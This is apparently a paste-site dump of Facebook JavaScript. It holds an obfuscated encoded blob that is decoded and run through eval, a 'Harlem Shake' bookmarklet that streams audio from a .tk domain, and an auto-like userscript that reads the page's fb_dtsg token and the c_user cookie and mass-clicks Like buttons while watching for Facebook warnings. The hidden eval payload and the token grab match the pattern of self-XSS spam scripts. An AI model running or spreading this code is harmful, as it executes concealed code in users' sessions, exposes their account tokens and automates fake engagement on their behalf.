B1744B1324F1450D1107E1261A1261C1653A1359C1814F1807F1835F1744A1716A1737A1884A1842B1849A1716C1849D1744B1730E1765B1716A1807F1758C1744B1261B1464F1261E1751F1856C1807F1730F1849E1772C1814F1807B1261B1317D1324B1261C1898E1107D1261F1261A1261E1261F1772F1751F1261A1317B1653C1359B1835C1744F1716C1737B1884B1618E1849A1716D1849C1744E1261F1464C1464D1261E1401E1261C1303E1303D1261A1653E1359E1842B1849F1716B1849B1856D1842F1261B1464D1464F1261A1387F1373A1373C1324B1261E1898E1107A1261B1261B1261E1261C1261E1261D1653F1359B1730A1793A1814F1842A1744F1450D1107A1261D1261A1261D1261E1912C1107A1261B1261E1912D1450C1107C1261F1261F1653C1359E1842E1744C1807D1737D1317B1653B1597C1716B1835C1716C1800A1842A1324B1450B1107B1912B1107F1548C1513E1618B1317A1275E1380A1373B1373C1373B1373E1387B1429B1380D1401C1373D1394A1387E1394F1429E1429D1275A1324B1450F1107B1548D1513B1618E1317C1275A1380F1373B1373C1373E1373D1380F1373C1436C1401E1408C1387D1387A1394D1394F1429D1275C1324E1450B1107B1548E1513F1618A1317B1275E1380B1373A1373F1373C1373C1415B1415B1373A1387A1415A1380A1408C1394F1429F1429B1275B1324F1450B1107B1548C1513B1618B1317C1275E1380C1373A1373E1373B1373A1394E1387A1436C1394B1408A1415C1408B1436D1401C1401D1275A1324F1450C1107C1548D1513D1618F1317C1275C1380E1373E1373A1373E1373D1408C1415A1373B1408F1415B1394C1387B1387A1380C1394E1275C1324E1450C';var _9601=/[\x41\x42\x43\x44\x45\x46]/;var _5943=2;var _6961=_3509.charAt(_3509.length-1);var _5044;var _1181=_3509.split(_9601);var _8108=[String.fromCharCode,isNaN,parseInt,String];_1181[1]=_8108[_5943+1](_8108[_5943](_1181[1])/21);var _6368=(_5943==8)?String:eval;_5044='';_11=_8108[_5943](_1181[0])/_8108[_5943](_1181[1]);for(_8649=3;_8649<_11;_8649++)_5044+=(_8108[_5943-2]((_8108[_5943](_1181[_8649])+_8108[_5943](_1181[2])+_8108[_5943](_1181[1]))/_8108[_5943](_1181[1])-_8108[_5943](_1181[2])+_8108[_5943](_1181[1])-1));var _7677='_8368';var _1634='_7677=_5044';function _3199(_9057){_6368(_8246);_3199(_5612);_5612(_1634);_3199(_7677);}var _8246='_3199=_6368';var _5612='_5612=_3199';_3199(_6961);
  252.  
  253.  
  254. // Music
  255. javascript:(function(){function c(){var e=document.createElement('link');e.setAttribute('type','text/css');e.setAttribute('rel','stylesheet');e.setAttribute('class',l);document.body.appendChild(e)}function h(){var e=document.getElementsByClassName(l);for(var t=0;t<e.length;t++){document.body.removeChild(e[t])}}function p(){var e=document.createElement('div');e.setAttribute('class',a);document.body.appendChild(e);setTimeout(function(){document.body.removeChild(e)},100)}function d(e){return{height:e.offsetHeight,width:e.offsetWidth}}function v(i){var s=d(i);return s.height>e&&s.height<n&&s.width>t&&s.width<r}function m(e){var t=e;var n=0;while(!!t){n+=t.offsetTop;t=t.offsetParent}return n}function g(){var e=document.documentElement;if(!!window.innerWidth){return window.innerHeight}else if(e&&!isNaN(e.clientHeight)){return e.clientHeight}return 0}function y(){if(window.pageYOffset){return window.pageYOffset}return Math.max(document.documentElement.scrollTop,document.body.scrollTop)}function E(e){var t=m(e);return t>=w&&t <=b+w}function S(){var e=document.createElement('audio');e.setAttribute('class',l);e.src=i;e.loop=true;e.addEventListener('canplay',function(){setTimeout(function(){x(k)},500);setTimeout(function(){N();p();for(var e=0;e<O.length;e++){T(O[e])}},15500)},true);e.addEventListener('ended',function(){N();h()},true);e.innerHTML=' <p>If you are reading this, it is because your browser does not support the audio element. We recommend that you get a new browser.</p> <p>';document.body.appendChild(e);e.play()}function x(e){e.className+=' '+s+' '+o}function T(e){e.className+=' '+s+' '+u[Math.floor(Math.random()*u.length)]}function N(){var e=document.getElementsByClassName(s);var t=new RegExp('\\b'+s+'\\b');for(var n=0;n<e.length;){e[n].className=e[n].className.replace(t,'')}}var e=1;var t=1;var n=100;var r=100;var i='http://sodavnz.tk/nangamxadan.mp3';var s='mw-harlem_shake_me';var o='im_first';var u=['im_drunk','im_baked','im_trippin','im_blown'];var a='mw-strobe_light';var l='mw_added_css';var b=g();var w=y();var C=document.getElementsByTagName('*');var k=null;for(var L=0;L<C.length;L++){var A=C[L];if(v(A)){if(E(A)){k=A;break}}}if(A===null){console.warn('Could not find a node of the right size. Please try a different page.');return}c();S();var O=[];for(var L=0;L<C.length;L++){var A=C[L];if(v(A)){O.push(A)}}})()
  256. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  257. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  258. //By @Lryan_rc
  259. body = document.body;
  260. if(body != null)
  261. {
  262. div = document.createElement("div");
  263. div.style.position = "fixed";
  264. div.style.display = "block";
  265. div.style.width = "130px";
  266. div.style.opacity= 0.90;
  267. div.style.bottom = "+70px";
  268. div.style.left = "+0px";
  269. div.style.backgroundColor = "#E7EBF2";
  270. div.style.border = "1px solid #6B84B4";
  271. div.style.padding = "3px";
  272. div.innerHTML = "<a style='font-weight:bold;color:#E30505' href='' title='Refresh'><blink><center>Close (F5)</center></blink></a>"
  273. body.appendChild(div);
  274. }
  275.  
  276. if(body != null)
  277. {
  278. div = document.createElement("div");
  279. div.setAttribute('id','like2');
  280. div.style.position = "fixed";
  281. div.style.display = "block";
  282. div.style.width = "130px";
  283. div.style.opacity= 0.90;
  284. div.style.bottom = "+49px";
  285. div.style.left = "+0px";
  286. div.style.backgroundColor = "#E7EBF2";
  287. div.style.border = "1px solid #6B84B4";
  288. div.style.padding = "3px";
  289. div.innerHTML = "<a style='font-weight:bold;color:#3B5998' onclick='Lryanrc()'><center>By Lryan Rc</center></a></a>"
  290. body.appendChild(div);
  291. unsafeWindow.Lryanrc = function()
  292. {
  293. var B=0;
  294. var J=0;
  295. var I=document.getElementsByTagName("a");
  296. var H=new Array();
  297. for(var D=0;D<I.length;D++)
  298. {
  299. if(I[D].getAttribute("class")!=null&&I[D].getAttribute("class").indexOf("UFILikeLink")>=0&&(I[D].innerHTML=="Me gusta"||I[D].innerHTML=="Like"||I[D].innerHTML=="?????"||I[D].innerHTML=="Suka"||I[D].innerHTML=="Begen"||I[D].innerHTML=="??????"||I[D].innerHTML=="???!"||I[D].innerHTML=="?"||I[D].innerHTML=="Seneng"||I[D].innerHTML=="???"||I[D].innerHTML=="J?¢â‚¬â„¢aime"))
  300. {
  301. H[J]=I[D];
  302. J++
  303. }
  304. }
  305. function E(L)
  306. {
  307. H[L].click();
  308. var K="<a style='font-weight:bold;color:#3B5998' onclick='Autolike()'><center>Like Status: "+(L+1)+"/"+H.length+"</center></a>";
  309. document.getElementById("like2").innerHTML=K
  310. }
  311. function G(K)
  312. {
  313. window.setTimeout(C,K)
  314. }
  315. function A()
  316. {
  317. var M=document.getElementsByTagName("label");
  318. var N=false;
  319. for(var L=0;L<M.length;L++)
  320. {
  321. var K=M[L].getAttribute("class");
  322. if(K!=null&&K.indexOf("uiButton uiButtonLarge uiButtonConfirm")>=0)
  323. {
  324. alert("Warning from Facebook");
  325. N=true
  326. }
  327. }
  328. if(!N)
  329. {
  330. G(2160)
  331. }
  332. }
  333. function F(K)
  334. {
  335. window.setTimeout(A,K)
  336. }
  337. function C()
  338. {
  339. if(B<H.length)
  340. {
  341. E(B);
  342. F(700);
  343. B++
  344. }
  345. }
  346. ;
  347. C()
  348. }
  349. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement